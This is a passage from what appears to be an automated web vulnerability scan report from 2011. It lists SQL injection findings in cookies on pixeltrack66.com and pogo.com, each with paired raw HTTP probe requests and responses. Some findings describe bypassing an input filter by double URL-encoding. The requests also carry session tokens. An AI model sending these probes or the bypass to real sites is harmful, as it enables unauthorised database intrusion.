Cookie: ruid=154d290e46adc1d6f373dd09^1^1294536262^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3UdIwsGOQ/PP8TzZUxGDmBad2r6N25AKxdPo9e''; put_1523=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ; au=GIP9HWY4-MADS-10.208.38.239; ses15=4762^2; csi15=3188204.js^1^1294536315^1294536315; rpb=4210%3D1%264214%3D1; put_1197=3271971346728586924; cd=false; rdk=4252/4762; ses2=4762^1; csi2=3146355.js^1^1294536507^1294536507

Response 2

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:25:54 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=4252/4762; expires=Sun, 09-Jan-2011 03:25:54 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=0; expires=Sun, 09-Jan-2011 03:25:54 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses2=4762^2; expires=Mon, 10-Jan-2011 05:59:59 GMT; max-age=106445; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi2=3156581.js^1^1294539954^1294539954&3146355.js^1^1294536507^1294536507; expires=Sun, 16-Jan-2011 02:25:54 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Connection: close
Content-Type: application/x-javascript
Content-Length: 2284

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3156581"
...[SNIP]...

1.15. http://www.pixeltrack66.com/mt/03745344/&subid1=MQExit&subid2=CD99&subid3=409&web_id=e99MQExit&orig=CD99&s=MQExit&c=409 [mt_clk cookie]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pixeltrack66.com
Path:   /mt/03745344/&subid1=MQExit&subid2=CD99&subid3=409&web_id=e99MQExit&orig=CD99&s=MQExit&c=409

Issue detail

The mt_clk cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the mt_clk cookie, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /mt/03745344/&subid1=MQExit&subid2=CD99&subid3=409&web_id=e99MQExit&orig=CD99&s=MQExit&c=409 HTTP/1.1
Host: www.pixeltrack66.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mt_clk=54267db83a49b89cd0644d669488302a'; mt_lds=54267db83a49b89cd0644d669488302a; PHPSESSID=vcnvs4i5j3pnkunpsl190rd6p6;

Response 1

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 05:13:51 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.9
P3P: CP="ALL DSP COR CURa ADMa DEVa TAIa IVAi IVDi CONi HISi TELi OUR IND PHY ONL FIN COM NAV INT DEM GOV"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: mt_imp=54267db83a49b89cd0644d669488302a%27; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 202

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''54267db83a49b89cd0644d669488302a'' and record_adjust2=1' at line 2

Request 2

GET /mt/03745344/&subid1=MQExit&subid2=CD99&subid3=409&web_id=e99MQExit&orig=CD99&s=MQExit&c=409 HTTP/1.1
Host: www.pixeltrack66.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mt_clk=54267db83a49b89cd0644d669488302a''; mt_lds=54267db83a49b89cd0644d669488302a; PHPSESSID=vcnvs4i5j3pnkunpsl190rd6p6;

Response 2

HTTP/1.1 302 Found
Date: Sun, 09 Jan 2011 05:13:51 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.9
P3P: CP="ALL DSP COR CURa ADMa DEVa TAIa IVAi IVDi CONi HISi TELi OUR IND PHY ONL FIN COM NAV INT DEM GOV"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: mt_imp=54267db83a49b89cd0644d669488302a%27%27; path=/
Location: http://www.yourpurecrushes.com/hv1/blender_redirect.php?web_id=CD1&&web_id=e99MQExit&orig=CD99&s=MQExit&c=409
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


1.16. http://www.pixeltrack66.com/mt/03745344/&subid1=MQExit&subid2=CD99&subid3=409&web_id=e99MQExitPop&orig=CD99&s=MQExit&c=409 [mt_clk cookie]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pixeltrack66.com
Path:   /mt/03745344/&subid1=MQExit&subid2=CD99&subid3=409&web_id=e99MQExitPop&orig=CD99&s=MQExit&c=409

Issue detail

The mt_clk cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the mt_clk cookie, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /mt/03745344/&subid1=MQExit&subid2=CD99&subid3=409&web_id=e99MQExitPop&orig=CD99&s=MQExit&c=409 HTTP/1.1
Host: www.pixeltrack66.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mt_clk=54267db83a49b89cd0644d669488302a'; mt_lds=54267db83a49b89cd0644d669488302a; PHPSESSID=vcnvs4i5j3pnkunpsl190rd6p6;

Response 1

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 05:14:02 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.9
P3P: CP="ALL DSP COR CURa ADMa DEVa TAIa IVAi IVDi CONi HISi TELi OUR IND PHY ONL FIN COM NAV INT DEM GOV"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: mt_imp=54267db83a49b89cd0644d669488302a%27; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 202

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''54267db83a49b89cd0644d669488302a'' and record_adjust2=1' at line 2

Request 2

GET /mt/03745344/&subid1=MQExit&subid2=CD99&subid3=409&web_id=e99MQExitPop&orig=CD99&s=MQExit&c=409 HTTP/1.1
Host: www.pixeltrack66.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mt_clk=54267db83a49b89cd0644d669488302a''; mt_lds=54267db83a49b89cd0644d669488302a; PHPSESSID=vcnvs4i5j3pnkunpsl190rd6p6;

Response 2

HTTP/1.1 302 Found
Date: Sun, 09 Jan 2011 05:14:02 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.9
P3P: CP="ALL DSP COR CURa ADMa DEVa TAIa IVAi IVDi CONi HISi TELi OUR IND PHY ONL FIN COM NAV INT DEM GOV"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: mt_imp=54267db83a49b89cd0644d669488302a%27%27; path=/
Location: http://www.yourpurecrushes.com/hv1/blender_redirect.php?web_id=CD1&&web_id=e99MQExitPop&orig=CD99&s=MQExit&c=409
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


1.17. http://www.pixeltrack66.com/mt/x2a40344g4q2/&subid1=MQThankYou&subid2=CD99&subid3=409&subid4= [mt_clk cookie]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pixeltrack66.com
Path:   /mt/x2a40344g4q2/&subid1=MQThankYou&subid2=CD99&subid3=409&subid4=

Issue detail

The mt_clk cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the mt_clk cookie, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /mt/x2a40344g4q2/&subid1=MQThankYou&subid2=CD99&subid3=409&subid4= HTTP/1.1
Host: www.pixeltrack66.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mt_clk=54267db83a49b89cd0644d669488302a'; mt_lds=54267db83a49b89cd0644d669488302a; PHPSESSID=vcnvs4i5j3pnkunpsl190rd6p6;

Response 1

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 05:14:12 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.9
P3P: CP="ALL DSP COR CURa ADMa DEVa TAIa IVAi IVDi CONi HISi TELi OUR IND PHY ONL FIN COM NAV INT DEM GOV"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: mt_imp=54267db83a49b89cd0644d669488302a%27; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 202

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''54267db83a49b89cd0644d669488302a'' and record_adjust2=1' at line 2

Request 2

GET /mt/x2a40344g4q2/&subid1=MQThankYou&subid2=CD99&subid3=409&subid4= HTTP/1.1
Host: www.pixeltrack66.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mt_clk=54267db83a49b89cd0644d669488302a''; mt_lds=54267db83a49b89cd0644d669488302a; PHPSESSID=vcnvs4i5j3pnkunpsl190rd6p6;

Response 2

HTTP/1.1 302 Found
Date: Sun, 09 Jan 2011 05:14:12 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.9
P3P: CP="ALL DSP COR CURa ADMa DEVa TAIa IVAi IVDi CONi HISi TELi OUR IND PHY ONL FIN COM NAV INT DEM GOV"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: mt_imp=54267db83a49b89cd0644d669488302a%27%27; path=/
Location: http://www.socialtrack.net/click.track?CID=121402&AFID=73472&ADID=297792&SUBID=CD1
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


1.18. http://www.pogo.com/ [com.pogo.ga cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pogo.com
Path:   /

Issue detail

The com.pogo.ga cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the com.pogo.ga cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /?pageSection=homnav_logo HTTP/1.1
Host: www.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga='; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536563456-New%7C1297128563456%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=;

Response 1 (redirected)

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Content-Language: en-US
Set-Cookie: com.pogo.supressGiftLayer=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/home
Content-Type: text/html;charset=UTF-8
Date: Sun, 09 Jan 2011 01:57:16 GMT
Server: Apache-Coyote/1.1
Content-Length: 430000


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
reg/signin.do', {
       method : 'get',
       data : 'returnType=&returnValue=' + escape(''),
       onSuccess: function(responseText) {
           var forwardUrl = responseText;
           window.location = forwardUrl;
       },
       onFailure: function () {
           alert('Could not log you in');
           MootoolsUtils.dispose($('fb-reg-signin-backdrop'));
       }
   });
}


</script>
...[SNIP]...
<a href="http://puzzle-games.pogo.com/games/stackem?pageSection=free_home_all_games2_img_stax">
...[SNIP]...

Request 2

GET /?pageSection=homnav_logo HTTP/1.1
Host: www.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=''; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536563456-New%7C1297128563456%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=;

Response 2 (redirected)

HTTP/1.1 302 Moved Temporarily
Expires: 0
Cache-Control: max-age=0, private
Content-Language: en-US
Location: http://www.pogo.com/login/entry.jsp?site=pogo&redr=http%3A%2F%2Fwww.pogo.com%2F%3FpageSection%3Dhomnav_logo
Content-Type: text/html;charset=UTF-8
Content-Length: 0
Date: Sun, 09 Jan 2011 01:57:18 GMT
Server: Apache-Coyote/1.1


1.19. http://www.pogo.com/action/pogop/welcome.do [com.pogo.info cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pogo.com
Path:   /action/pogop/welcome.do

Issue detail

The com.pogo.info cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the com.pogo.info cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the com.pogo.info cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /action/pogop/welcome.do?intcmp=cp_10price_1110_cpcom_bottomtext HTTP/1.1
Host: www.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536563456-New%7C1297128563456%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71%2527; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=;

Response 1 (redirected)

HTTP/1.1 200 OK
Expires: 0
Cache-Control: no-cache, no-store
Content-Language: en-US
Pragma: no-cache
Set-Cookie: com.pogo.info=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/login
Set-Cookie: com.pogo.lkey=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Date: Sun, 09 Jan 2011 01:55:51 GMT
Server: Apache-Coyote/1.1
Content-Length: 35534


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
reg/signin.do', {
       method : 'get',
       data : 'returnType=&returnValue=' + escape(''),
       onSuccess: function(responseText) {
           var forwardUrl = responseText;
           window.location = forwardUrl;
       },
       onFailure: function () {
           alert('Could not log you in');
           MootoolsUtils.dispose($('fb-reg-signin-backdrop'));
       }
   });
}


</script>
...[SNIP]...
Bowling,Sci-Fi Slots,SCRABBLE,SCRABBLE Cubes,Scrabble Tour,Showbiz Slots,Showbiz Slots II,Shuffle Bump,Shutter Island,Slingo,Sock Hop Slots,Solitaire Rush,Spades,Spider Solitaire,Spin Win,Squelchies,Stack 'em,Stellar Sweeper,Sudoku Classic,Sudoku Puzzle Blast,Sudoku Quest,Super Dominoes,Swashbucks,Swashbucks To Go,Sweet Tooth 2,Sweet Tooth To Go,Texas Hold'em Poker,The Poppit Show,The Price Is Right,Th
...[SNIP]...

Request 2

GET /action/pogop/welcome.do?intcmp=cp_10price_1110_cpcom_bottomtext HTTP/1.1
Host: www.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536563456-New%7C1297128563456%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71%2527%2527; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=;

Response 2 (redirected)

HTTP/1.1 302 Moved Temporarily
Expires: 0
Cache-Control: max-age=0, private
Content-Language: en-US
Location: http://www.pogo.com/action/pogop/lightregview.do
Content-Type: text/html;charset=UTF-8
Content-Length: 0
Date: Sun, 09 Jan 2011 01:55:51 GMT
Server: Apache-Coyote/1.1


1.20. http://www.pogo.com/home/home.jsp [com.pogo.info cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pogo.com
Path:   /home/home.jsp

Issue detail

The com.pogo.info cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the com.pogo.info cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the com.pogo.info cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /home/home.jsp?sls=2&site=pogo HTTP/1.1
Host: www.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536563456-New%7C1297128563456%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71%2527; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=;

Response 1 (redirected)

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Content-Language: en-US
Set-Cookie: com.pogo.supressGiftLayer=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/home
Content-Type: text/html;charset=UTF-8
Date: Sun, 09 Jan 2011 01:48:48 GMT
Server: Apache-Coyote/1.1
Content-Length: 429485


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
reg/signin.do', {
       method : 'get',
       data : 'returnType=&returnValue=' + escape(''),
       onSuccess: function(responseText) {
           var forwardUrl = responseText;
           window.location = forwardUrl;
       },
       onFailure: function () {
           alert('Could not log you in');
           MootoolsUtils.dispose($('fb-reg-signin-backdrop'));
       }
   });
}


</script>
...[SNIP]...
<a href="http://puzzle-games.pogo.com/games/stackem?pageSection=free_home_all_games1_img_stax">
...[SNIP]...

Request 2

GET /home/home.jsp?sls=2&site=pogo HTTP/1.1
Host: www.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536563456-New%7C1297128563456%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71%2527%2527; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=;

Response 2

HTTP/1.1 301 Moved Permanently
Location: /?sls=2&site=pogo
Content-Length: 0
Date: Sun, 09 Jan 2011 01:48:49 GMT
Server: Apache-Coyote/1.1


1.21. http://www.pogo.com/home/home.jsp [com.pogo.unid cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pogo.com
Path:   /home/home.jsp

Issue detail

The com.pogo.unid cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the com.pogo.unid cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the com.pogo.unid cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /home/home.jsp?sls=2&site=pogo HTTP/1.1
Host: www.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: com.pogo.recent=scrabble.2player.social.17fbdp; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856%2527; com.pogo.nsc=age.:sort.favdown:va.false:scrabble.2player.beginner:; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536931722-New%7C1297128931722%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=;

Response 1 (redirected)

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Content-Language: en-US
Set-Cookie: com.pogo.unid=6606480040167616; Domain=.pogo.com; Expires=Fri, 08-Jan-2016 02:59:22 GMT; Path=/
Set-Cookie: com.pogo.supressGiftLayer=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/home
Content-Type: text/html;charset=UTF-8
Date: Sun, 09 Jan 2011 02:59:21 GMT
Server: Apache-Coyote/1.1
